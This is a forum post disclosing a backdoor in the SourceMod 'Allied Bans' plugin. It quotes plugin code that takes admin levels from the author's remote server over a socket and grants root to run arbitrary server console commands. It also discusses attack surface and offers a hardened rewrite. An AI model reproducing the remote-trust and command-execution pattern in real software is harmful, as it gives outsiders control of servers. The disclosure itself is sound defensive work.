I spoke with asherkin about this before, as a few different people have brought up this plugin in the past, and I warn them each time about using it when I hear about it. Anyways, this newer version did not change anything, basically the author just left in the remote admin flags, but did so in a more subtle way:
stock bool:IsRootAdmin(client)
{
    if (client == 0) return true;           // server console always passes
    if (Level[client] >= 495) return true;  // Level[] is filled from the remote socket data (see HandleTAG below)
    return false;
}
So it used to query his db server with a password, but he switched to socket...
public HandleTAG(String:receiveData[], client) {
    // Parse string received over the socket
    decl String:tagdata[12][128];
    decl String:tagarray[12][256];
    decl String:clientAuth[64], String:bSteamID[64], String:sServername[64], String:sFlag[16];
    decl String:tTagcolor[128], String:tNickcolor[128], String:tChatcolor[128];
    decl String:leveldata[4][32];
    GetClientAuthString(client, clientAuth, sizeof(clientAuth));
    if (StrContains(receiveData, "!ABLEVEL!", false) >= 0) {
        // Message layout: <anything>!ABLEVEL!<steamid>!ABLEVEL!<level>
        ExplodeString(receiveData, "!ABLEVEL!", leveldata, sizeof(leveldata), sizeof(leveldata[]));
        // Copy rather than Format(): the field is remote data and must not be used as a format string
        strcopy(bSteamID, sizeof(bSteamID), leveldata[1]);
        if (StrEqual(bSteamID, clientAuth, false) == true) {
            // The level is taken verbatim from the remote host and stored into Level[], which IsRootAdmin() trusts
            new mylevel = StringToInt(leveldata[2]);
            Level[client] = mylevel;
            new String:Message[128];
            Format(Message, sizeof(Message), "Your Clearance is LEVEL %d", mylevel);
            PrintToTarget(client, Message);
        }
    }
    // remainder of the handler omitted in the original post
}
Now that's great and all, but let's not forget this little gem:
public Action:Command_Command(client, args)
{
    if (!IsRootAdmin(client)) {
        ReplyToCommand(client, "[AlliedBANS] You have no access to this command");
        return Plugin_Handled;
    }
    if (args < 1)
    {
        ReplyToCommand(client, "[AlliedBANS] SYNTAX : sm_ab_command <command>");
        ReplyToCommand(client, "[AlliedBANS] USE TO KICK BANNED USERS WHO DO NOT GET KICKED AUTOMATICALLY");
        return Plugin_Handled;
    }
    new String:Commands[512];
    GetCmdArgString(Commands, sizeof(Commands));
    if (client == 0) // They will already see the response in the console.
    {
        ServerCommand("%s", Commands);
    } else {
        decl String:responseBuffer[4096];
        decl String:exploded[256][16];
        // Any string the "root" caller supplies is executed as a server console command
        ServerCommandEx(responseBuffer, sizeof(responseBuffer), "%s", Commands);
        // The original passed the array dimensions in the wrong order (16, 256); use sizeof() so they match the declaration
        new segments = ExplodeString(responseBuffer, "\n", exploded, sizeof(exploded), sizeof(exploded[]), false);
        if (segments > 0) {
            ReplyToCommand(client, "### Start ###");
            for (new i = 0; i < segments; i++) {
                ReplyToCommand(client, "%s\n", exploded[i]);
            }
            ReplyToCommand(client, "### End ###");
        }
        ReplyToCommand(client, "%s", responseBuffer);
    }
    return Plugin_Handled;
}
    new mylevel = StringToInt(leveldata[2]);
grabs the player's "level" from his database. Previously, when I logged in and queried his database to get the levels of all of the players, there were some 20+ individuals that would have been "given" root access alone (note that this was ~4 months ago, so the user list may have changed). Though anyone could be added at any time, since it basically just queries that db (which you have no control over). Also, since this thing just queries tommy.or.kr via TCP to get this info, any attacker could use simple DNS hijacking to gain access (though perhaps unlikely).
I spoke with asherkin and got this response:
Quote:
05-12-14 , 08:22 AM Allied Bans (Kr)
Hey friagram,
Whoah! This one looks like it could be a mess.
I've moved your thread into a private forum for a bit while I look at it - the scope is quite massive and could be dire.
Thanks for the notice, I'll make the thread public again once we've got a better grasp of what's going on.
I noticed you're currently editing the thread, that'll probably fail - just PM me if there's anything else you'd like to add.
Regards,
Asher
and again:
Quote:
05-12-14 , 10:58 AM Re: Allied Bans (Kr)
Originally Posted by friagram
I didn't spend tons of time looking it over, but from what I saw and heard, there's a fair amount of people that run it. I told my Korean friends to just not use it, but they said that then all of the hackers/spammers/scammers would start coming to their servers. Anyways, it's hard to tell from the queries just how many people use it, since I can't really query everything or dump the structure.
I had a long discussion with the author earlier, he's working towards getting an update out with full source code and less questionable admin access bits.
Thanks again,
Asher
As for the rcon/socket/updater mentions: while perhaps unlikely, this particular combination does create an enormous attack surface, as you have:
1) admin
2) console access
3) ability to update plugins and thus use the entire sourcemod API to modify the filesystem
4) socket to do anything you want via TCP/UDP
So, it would technically be possible for them to update the plugin, install other plugins/extensions or programs, delete files that are not protected by the user, and perhaps even run system commands if your user privileges are not locked down.
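For comparison, here is a hardened variant of the two functions quoted above. It is added here as an illustration and is not code from the plugin or its author; it keeps the same Level[] array and the same "!ABLEVEL!" framing, but root access is decided by SourceMod's own admin records (GetUserAdmin/GetAdminFlag from admin.inc) and the remote level becomes purely cosmetic. It uses the same old-style (SourceMod 1.6) syntax as the snippets above.

```sourcepawn
#include <sourcemod>

new Level[MAXPLAYERS + 1];

// Root access is decided by the server owner's own admin config
// (admins.cfg / admins_simple.ini), never by anything received over the socket.
stock bool:IsRootAdmin(client)
{
    if (client == 0) return true;                 // server console
    if (!IsClientInGame(client)) return false;
    new AdminId:admin = GetUserAdmin(client);
    if (admin == INVALID_ADMIN_ID) return false;
    return GetAdminFlag(admin, Admin_Root);
}

// The "!ABLEVEL!" message only updates a cosmetic level used for chat tags;
// nothing in the plugin should branch on it for authorization.
public HandleTAG(String:receiveData[], client)
{
    new String:leveldata[4][32];   // zero-initialised, unlike decl
    new String:clientAuth[64];

    if (StrContains(receiveData, "!ABLEVEL!", false) < 0) return;

    // ExplodeString returns how many pieces were written; the original never
    // checked it, so a short message would have read empty or stale fields.
    new parts = ExplodeString(receiveData, "!ABLEVEL!", leveldata,
                              sizeof(leveldata), sizeof(leveldata[]));
    if (parts < 3) return;

    if (!IsClientInGame(client)) return;
    if (!GetClientAuthString(client, clientAuth, sizeof(clientAuth))) return;
    if (!StrEqual(leveldata[1], clientAuth, false)) return;

    // Clamp so a hostile peer cannot push nonsensical values into Level[].
    new mylevel = StringToInt(leveldata[2]);
    if (mylevel < 0) mylevel = 0;
    Level[client] = mylevel;
    PrintToChat(client, "Your Clearance is LEVEL %d", mylevel);  // display only
}
```

With this layout the remote host can still change what tag a player sees, but it can no longer grant sm_ab_command, because IsRootAdmin() never reads Level[].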